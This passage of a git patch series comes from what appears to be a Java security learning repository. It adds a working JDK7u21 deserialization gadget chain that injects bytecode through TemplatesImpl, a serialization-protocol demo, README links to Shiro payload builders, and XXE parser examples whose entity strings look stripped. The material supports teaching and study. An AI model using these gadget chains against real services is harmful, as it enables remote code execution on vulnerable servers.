EAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java new file mode 100644 index 0000000..e3fb4d0 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -0,0 +1,66 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import org.apache.commons.codec.binary.Base64; + +import javax.xml.transform.Templates; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.LinkedHashSet; +import java.util.Map; + +public class JDK7u21 { + public static void main(String[] args) throws Exception { + TemplatesImpl templates = new TemplatesImpl(); + setFieldValue(templates, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); + setFieldValue(templates, "_name", "HelloTemplatesImpl"); + setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + + String zeroHashCodeStr = "f5a5a608"; + + HashMap map = new HashMap(); + map.put(zeroHashCodeStr, "foo"); + + Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); + handlerConstructor.setAccessible(true); + InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Override.class, map); + + setFieldValue(tempHandler, "type", Templates.class); + Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); + + LinkedHashSet set = new LinkedHashSet(); // maintain order + set.add(templates); + set.add(proxy); + + setFieldValue(templates, "_auxClasses", null); + setFieldValue(templates, "_class", null); + + map.put(zeroHashCodeStr, templates); // swap in real object + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(set); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java index ec9aa5e..c2ff080 100644 --- a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java +++ b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; @@ -20,7 +21,6 @@ import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -33,7 +33,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); From 43f431135fd7330cfd61d277ed02d6eb2218d922 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 7 Jul 2021 05:26:50 +0800 Subject: [PATCH 28/35] my own JDK7u21 --- .../java/com/govuln/deserialization/JDK7u21.java | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java index e3fb4d0..eb037cc 100644 --- a/general/src/main/java/com/govuln/deserialization/JDK7u21.java +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -15,6 +15,7 @@ import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.util.HashMap; +import java.util.HashSet; import java.util.LinkedHashSet; import java.util.Map; @@ -29,24 +30,25 @@ public static void main(String[] args) throws Exception { String zeroHashCodeStr = "f5a5a608"; + // 实例化一个map,并添加Magic Number为key,也就是f5a5a608,value先随便设置一个值 HashMap map = new HashMap(); map.put(zeroHashCodeStr, "foo"); + // 实例化AnnotationInvocationHandler类 Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); handlerConstructor.setAccessible(true); - InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Override.class, map); + InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Templates.class, map); - setFieldValue(tempHandler, "type", Templates.class); + // 为tempHandler创造一层代理 Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); - LinkedHashSet set = new LinkedHashSet(); // maintain order + // 实例化HashSet,并将两个对象放进去 + HashSet set = new HashSet(); // maintain order set.add(templates); set.add(proxy); - setFieldValue(templates, "_auxClasses", null); - setFieldValue(templates, "_class", null); - - map.put(zeroHashCodeStr, templates); // swap in real object + // 将恶意templates设置到map中 + map.put(zeroHashCodeStr, templates); ByteArrayOutputStream barr = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(barr); From b9847809da5a39456cb229a12688ee5e2efd13f5 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 7 Jul 2021 21:54:39 +0800 Subject: [PATCH 29/35] =?UTF-8?q?=E4=BD=BF=E7=94=A8LinkedHashSet=E8=A7=A3?= =?UTF-8?q?=E5=86=B3=E6=9C=89=E6=97=B6=E5=80=99=E6=97=A0=E6=B3=95=E8=A7=A6?= =?UTF-8?q?=E5=8F=91=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E7=9A=84=E9=97=AE?= =?UTF-8?q?=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 原因是templates与proxy是有顺序的,如果用HashSet将丢掉顺序,这样有概率无法触发 --- general/pom.xml | 14 ++------------ .../java/com/govuln/deserialization/JDK7u21.java | 2 +- 2 files changed, 3 insertions(+), 13 deletions(-) diff --git a/general/pom.xml b/general/pom.xml index 9153046..1d58119 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.7 - 1.7 + 1.6 + 1.6 @@ -96,15 +96,5 @@ - - - org.apache.maven.plugins - maven-compiler-plugin - - 7 - 7 - - - diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java index eb037cc..a7824f5 100644 --- a/general/src/main/java/com/govuln/deserialization/JDK7u21.java +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -43,7 +43,7 @@ public static void main(String[] args) throws Exception { Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); // 实例化HashSet,并将两个对象放进去 - HashSet set = new HashSet(); // maintain order + HashSet set = new LinkedHashSet(); set.add(templates); set.add(proxy); From 635e63d641d508ba4e63313336b8750298c41004 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 7 Jul 2021 23:42:18 +0800 Subject: [PATCH 30/35] update manual --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index dbfc6f7..cc8c809 100644 --- a/README.md +++ b/README.md @@ -22,6 +22,7 @@ - [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) +- [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) ## Demo代码 @@ -42,6 +43,7 @@ - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) - 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: From 7371e48a2af6eeb518523f5e88ba55238607e182 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 9 Jul 2021 03:29:44 +0800 Subject: [PATCH 31/35] add serialization module --- general/pom.xml | 17 +++++++ .../com/govuln/serialization/Application.java | 47 +++++++++++++++++++ .../com/govuln/serialization/Converter.java | 39 +++++++++++++++ .../com/govuln/serialization/model/Card.java | 12 +++++ .../com/govuln/serialization/model/User.java | 15 ++++++ 5 files changed, 130 insertions(+) create mode 100644 general/src/main/java/com/govuln/serialization/Application.java create mode 100644 general/src/main/java/com/govuln/serialization/Converter.java create mode 100644 general/src/main/java/com/govuln/serialization/model/Card.java create mode 100644 general/src/main/java/com/govuln/serialization/model/User.java diff --git a/general/pom.xml b/general/pom.xml index 1d58119..97a028b 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -48,6 +48,13 @@ commons-codec 1.15 + + + commons-io + commons-io + 2.10.0 + + @@ -96,5 +103,15 @@ + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + diff --git a/general/src/main/java/com/govuln/serialization/Application.java b/general/src/main/java/com/govuln/serialization/Application.java new file mode 100644 index 0000000..65c0712 --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/Application.java @@ -0,0 +1,47 @@ +package com.govuln.serialization; + +import com.govuln.serialization.model.User; +import org.apache.commons.codec.binary.Hex; +import org.apache.commons.io.IOUtils; +import static java.io.ObjectStreamConstants.*; + +import java.io.*; + +public class Application { + public static void main(String[] args) throws Exception + { + write(); + read(); + } + + public static void write() throws Exception + { + ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(byteSteam); + oos.writeObject(new User()); + + String data = Hex.encodeHexString(byteSteam.toByteArray()); + System.out.println(data); + ProcessBuilder builder = new ProcessBuilder( + "java", + "-jar", + "D:\\program\\SerializationDumper\\SerializationDumper-v1.13.jar", + data); + InputStream is = builder.start().getInputStream(); + IOUtils.copy(is, System.out); + } + + public static void read() throws Exception + { + Object[] data = { + STREAM_MAGIC, STREAM_VERSION, + TC_STRING, + "123123", + }; + byte[] bs = Converter.toBytes(data); + System.out.println(Hex.encodeHexString(bs)); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bs)); + Object obj = ois.readObject(); + System.out.println(obj); + } +} diff --git a/general/src/main/java/com/govuln/serialization/Converter.java b/general/src/main/java/com/govuln/serialization/Converter.java new file mode 100644 index 0000000..d3b6ed4 --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/Converter.java @@ -0,0 +1,39 @@ +package com.govuln.serialization; + +import java.io.ByteArrayOutputStream; +import java.io.DataOutputStream; +import java.io.IOException; +import java.io.ObjectOutputStream; + +public class Converter { + public static byte[] toBytes(Object[] objs) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + DataOutputStream dos = new DataOutputStream(baos); + for (Object obj : objs) { + treatObject(dos, obj); + } + dos.close(); + return baos.toByteArray(); + } + + public static void treatObject(DataOutputStream dos, Object obj) + throws IOException { + if (obj instanceof Byte) { + dos.writeByte((Byte) obj); + } else if (obj instanceof Short) { + dos.writeShort((Short) obj); + } else if (obj instanceof Integer) { + dos.writeInt((Integer) obj); + } else if (obj instanceof Long) { + dos.writeLong((Long) obj); + } else if (obj instanceof String) { + dos.writeUTF((String) obj); + } else { + ByteArrayOutputStream ba = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(ba); + oos.writeObject(obj); + oos.close(); + dos.write(ba.toByteArray(), 4, ba.size() - 4); // 4 = skip the header + } + } +} diff --git a/general/src/main/java/com/govuln/serialization/model/Card.java b/general/src/main/java/com/govuln/serialization/model/Card.java new file mode 100644 index 0000000..f73fbfc --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/model/Card.java @@ -0,0 +1,12 @@ +package com.govuln.serialization.model; + +import java.io.Serializable; + +public class Card implements Serializable { + public Integer value; + + public Card() + { + this.value = 100; + } +} diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/general/src/main/java/com/govuln/serialization/model/User.java new file mode 100644 index 0000000..8707855 --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/model/User.java @@ -0,0 +1,15 @@ +package com.govuln.serialization.model; + +import java.io.Serializable; + +public class User implements Serializable { + protected String name; + protected Card card; + + public User() + { + this.name = "Bob"; + this.card = new Card(); + } + +} From 30881f4796a4278899371269bfdbc49888bfa2b9 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 18 Mar 2022 01:58:36 +0800 Subject: [PATCH 32/35] add a new section --- README.md | 10 +++- general/general.iml | 19 -------- .../com/govuln/serialization/Application.java | 47 ------------------- .../serialization/UserSerialization.java | 24 ++++++++++ .../com/govuln/serialization/model/Card.java | 12 ----- .../com/govuln/serialization/model/User.java | 11 +++-- 6 files changed, 39 insertions(+), 84 deletions(-) delete mode 100644 general/general.iml delete mode 100644 general/src/main/java/com/govuln/serialization/Application.java create mode 100644 general/src/main/java/com/govuln/serialization/UserSerialization.java delete mode 100644 general/src/main/java/com/govuln/serialization/model/Card.java diff --git a/README.md b/README.md index cc8c809..d6a7031 100644 --- a/README.md +++ b/README.md @@ -23,6 +23,7 @@ - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) - [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) +- [Java安全漫谈 - 19.Java反序列化协议构造与分析](https://t.zsxq.com/ZfiEeEY) ## Demo代码 @@ -42,8 +43,8 @@ - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) -- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) -- 简化版Java原生利用链 [JDK7u21](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/JDK7u21.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](general/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: @@ -51,3 +52,8 @@ Shiro反序列化: - 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 - 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 - 使用Shiro默认自带的commons-beanutils构造的反序列化利用链:[CommonsBeanutils1Shiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java) + +自研反序列化分析工具: + +- zkar: +- 如何使用zkar修复SerialVersionUID不匹配的问题: diff --git a/general/general.iml b/general/general.iml deleted file mode 100644 index 7ee5fc5..0000000 --- a/general/general.iml +++ /dev/null @@ -1,19 +0,0 @@ - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/general/src/main/java/com/govuln/serialization/Application.java b/general/src/main/java/com/govuln/serialization/Application.java deleted file mode 100644 index 65c0712..0000000 --- a/general/src/main/java/com/govuln/serialization/Application.java +++ /dev/null @@ -1,47 +0,0 @@ -package com.govuln.serialization; - -import com.govuln.serialization.model.User; -import org.apache.commons.codec.binary.Hex; -import org.apache.commons.io.IOUtils; -import static java.io.ObjectStreamConstants.*; - -import java.io.*; - -public class Application { - public static void main(String[] args) throws Exception - { - write(); - read(); - } - - public static void write() throws Exception - { - ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); - ObjectOutputStream oos = new ObjectOutputStream(byteSteam); - oos.writeObject(new User()); - - String data = Hex.encodeHexString(byteSteam.toByteArray()); - System.out.println(data); - ProcessBuilder builder = new ProcessBuilder( - "java", - "-jar", - "D:\\program\\SerializationDumper\\SerializationDumper-v1.13.jar", - data); - InputStream is = builder.start().getInputStream(); - IOUtils.copy(is, System.out); - } - - public static void read() throws Exception - { - Object[] data = { - STREAM_MAGIC, STREAM_VERSION, - TC_STRING, - "123123", - }; - byte[] bs = Converter.toBytes(data); - System.out.println(Hex.encodeHexString(bs)); - ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bs)); - Object obj = ois.readObject(); - System.out.println(obj); - } -} diff --git a/general/src/main/java/com/govuln/serialization/UserSerialization.java b/general/src/main/java/com/govuln/serialization/UserSerialization.java new file mode 100644 index 0000000..d20a7af --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/UserSerialization.java @@ -0,0 +1,24 @@ +package com.govuln.serialization; + +import com.govuln.serialization.model.User; +import org.apache.commons.codec.binary.Base64; + +import java.io.*; + +public class UserSerialization { + public static void main(String[] args) throws Exception + { + write(); + } + + public static void write() throws Exception + { + User user = new User("Bob"); + user.setParent(new User("Josua")); + ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(byteSteam); + oos.writeObject(user); + + System.out.println(Base64.encodeBase64String(byteSteam.toByteArray())); + } +} diff --git a/general/src/main/java/com/govuln/serialization/model/Card.java b/general/src/main/java/com/govuln/serialization/model/Card.java deleted file mode 100644 index f73fbfc..0000000 --- a/general/src/main/java/com/govuln/serialization/model/Card.java +++ /dev/null @@ -1,12 +0,0 @@ -package com.govuln.serialization.model; - -import java.io.Serializable; - -public class Card implements Serializable { - public Integer value; - - public Card() - { - this.value = 100; - } -} diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/general/src/main/java/com/govuln/serialization/model/User.java index 8707855..bda5098 100644 --- a/general/src/main/java/com/govuln/serialization/model/User.java +++ b/general/src/main/java/com/govuln/serialization/model/User.java @@ -4,12 +4,15 @@ public class User implements Serializable { protected String name; - protected Card card; + protected User parent; - public User() + public User(String name) { - this.name = "Bob"; - this.card = new Card(); + this.name = name; } + public void setParent(User parent) + { + this.parent = parent; + } } From 35f83ede0b6ed40204fa699589e43a4b4cf3cae5 Mon Sep 17 00:00:00 2001 From: phith0n Date: Mon, 12 Aug 2024 16:40:30 +0800 Subject: [PATCH 33/35] added XXE related examples --- general/pom.xml | 6 ++-- .../govuln/xxe/DocumentBuilderExample.java | 18 ++++++++++++ .../java/com/govuln/xxe/SAXParserExample.java | 23 +++++++++++++++ .../java/com/govuln/xxe/XMLReaderExample.java | 22 +++++++++++++++ .../java/com/govuln/xxe/XMLStreamExample.java | 28 +++++++++++++++++++ .../govuln/xxe/XPathExpressionExample.java | 22 +++++++++++++++ 6 files changed, 115 insertions(+), 4 deletions(-) create mode 100644 general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java create mode 100644 general/src/main/java/com/govuln/xxe/SAXParserExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XMLReaderExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XMLStreamExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XPathExpressionExample.java diff --git a/general/pom.xml b/general/pom.xml index 97a028b..29d9524 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.6 - 1.6 + 8 + 8 @@ -54,8 +54,6 @@ commons-io 2.10.0 - - diff --git a/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java b/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java new file mode 100644 index 0000000..3111c38 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java @@ -0,0 +1,18 @@ +package com.govuln.xxe; + +import org.w3c.dom.Document; +import javax.xml.parsers.DocumentBuilder; +import javax.xml.parsers.DocumentBuilderFactory; +import java.io.ByteArrayInputStream; + +public class DocumentBuilderExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + DocumentBuilder db = DocumentBuilderFactory.newInstance().newDocumentBuilder(); + Document doc = db.parse(new ByteArrayInputStream(data.getBytes())); + System.out.println(doc.getDocumentElement().getTextContent()); + } +} diff --git a/general/src/main/java/com/govuln/xxe/SAXParserExample.java b/general/src/main/java/com/govuln/xxe/SAXParserExample.java new file mode 100644 index 0000000..46fa054 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/SAXParserExample.java @@ -0,0 +1,23 @@ +package com.govuln.xxe; + +import org.xml.sax.helpers.DefaultHandler; + +import javax.xml.parsers.SAXParser; +import javax.xml.parsers.SAXParserFactory; +import java.io.ByteArrayInputStream; + +public class SAXParserExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + SAXParser parser = SAXParserFactory.newInstance().newSAXParser(); + + parser.parse(new ByteArrayInputStream(data.getBytes()), new DefaultHandler() { + public void characters(char[] ch, int start, int length) { + System.out.print(new String(ch, start, length)); + } + }); + } +} diff --git a/general/src/main/java/com/govuln/xxe/XMLReaderExample.java b/general/src/main/java/com/govuln/xxe/XMLReaderExample.java new file mode 100644 index 0000000..459a222 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/XMLReaderExample.java @@ -0,0 +1,22 @@ +package com.govuln.xxe; + +import org.xml.sax.InputSource; +import org.xml.sax.XMLReader; +import org.xml.sax.helpers.DefaultHandler; +import org.xml.sax.helpers.XMLReaderFactory; + +public class XMLReaderExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + XMLReader reader = XMLReaderFactory.createXMLReader(); + reader.setContentHandler(new DefaultHandler() { + public void characters(char[] ch, int start, int length) { + System.out.print(new String(ch, start, length)); + } + }); + reader.parse(new InputSource(data)); + } +} diff --git a/general/src/main/java/com/govuln/xxe/XMLStreamExample.java b/general/src/main/java/com/govuln/xxe/XMLStreamExample.java new file mode 100644 index 0000000..0173a44 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/XMLStreamExample.java @@ -0,0 +1,28 @@ +package com.govuln.xxe; + +import javax.xml.stream.XMLInputFactory; +import javax.xml.stream.XMLStreamReader; +import java.io.*; + +public class XMLStreamExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + InputStream input = new ByteArrayInputStream(data.getBytes()); + XMLInputFactory factory = XMLInputFactory.newFactory(); + XMLStreamReader reader = factory.createXMLStreamReader(input); + + while (reader.hasNext()) { + reader.next(); + if (reader.isStartElement()) { + System.out.println("Start: " + reader.getLocalName()); + } else if (reader.isEndElement()) { + System.out.println("End: " + reader.getLocalName()); + } else if (reader.hasText()) { + System.out.println("Data: " + reader.getText().trim()); + } + } + } +} diff --git a/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java b/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java new file mode 100644 index 0000000..9b15047 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java @@ -0,0 +1,22 @@ +package com.govuln.xxe; + +import org.xml.sax.InputSource; +import javax.xml.xpath.XPath; +import javax.xml.xpath.XPathExpression; +import javax.xml.xpath.XPathFactory; +import java.io.ByteArrayInputStream; + +public class XPathExpressionExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + XPathFactory xPathFactory = XPathFactory.newInstance(); + XPath xpath = xPathFactory.newXPath(); + XPathExpression xPathExpr = xpath.compile("/foo/text()"); 